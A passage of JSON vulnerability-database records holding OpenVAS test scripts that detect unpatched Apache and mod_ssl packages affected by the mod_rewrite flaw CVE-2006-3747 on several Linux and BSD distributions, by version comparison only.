= 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065309", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065309", "type": "openvas", "title": "SLES9: Security update for Apache and mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018358.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache and mod_ssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65309\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache and mod_ssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.21\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-01.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57851", "href": "http://plugins.openvas.org/nasl.php?oid=57851", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-01 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in mod_rewrite could result in a Denial of Service or the execution\nof arbitrary code.\";\ntag_solution = \"All Apache users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose net-www/apache\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=141986\nhttp://www.apache.org/dist/httpd/Announcement2.0.html\nhttp://www.apache.org/dist/httpd/Announcement1.3.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-01.\";\n\n \n\nif(description)\n{\n script_id(57851);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200608-01 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"rge 1.3.34-r14\", \"rge 1.3.37\", \"ge 2.0.58-r2\"), vulnerable: make_list(\"lt 2.0.58-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231057168", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057168", "type": "openvas", "title": "Slackware Advisory SSA:2006-209-01 Apache httpd", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_209_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57168\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-209-01 Apache httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-209-01\");\n\n script_tag(name:\"insight\", value:\"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65309", "href": "http://plugins.openvas.org/nasl.php?oid=65309", "type": "openvas", "title": "SLES9: Security update for Apache and mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018358.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache and mod_ssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_ssl\n apache\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018358 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65309);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache and mod_ssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.21\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:57145", "href": "http://plugins.openvas.org/nasl.php?oid=57145", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID dc8c08c7-1e7c-11db-88cf-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+mod_perl\n apache+ipv6\n apache_fp\n ru-apache\n ru-apache+mod_ssl\n apache+ssl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n apache+mod_ssl+mod_accel\n apache+mod_ssl+mod_accel+ipv6\n apache+mod_ssl+mod_accel+mod_deflate\n apache+mod_ssl+mod_accel+mod_deflate+ipv6\n apache+mod_ssl+mod_deflate\n apache+mod_ssl+mod_deflate+ipv6\n apache+mod_ssl+mod_snmp\n apache+mod_ssl+mod_snmp+mod_accel\n apache+mod_ssl+mod_snmp+mod_accel+ipv6\n apache+mod_ssl+mod_snmp+mod_deflate\n apache+mod_ssl+mod_snmp+mod_deflate+ipv6\n apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://marc.theaimsgroup.com/?l=apache-httpd-announce&m=115409818602955\nhttp://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57145);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36_1\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.0.46\")>=0 && revcomp(a:bver, b:\"2.0.58_2\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.0\")>=0 && revcomp(a:bver, b:\"2.2.2_1\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36_1\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.37\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache_fp\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package apache_fp version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ru-apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.34.1.57_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+mod_deflate version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_accel+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_accel+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_deflate version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_deflate version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update to apache\nannounced via advisory DSA 1131-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:57201", "href": "http://plugins.openvas.org/nasl.php?oid=57201", "type": "openvas", "title": "Debian Security Advisory DSA 1131-1 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1131_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from 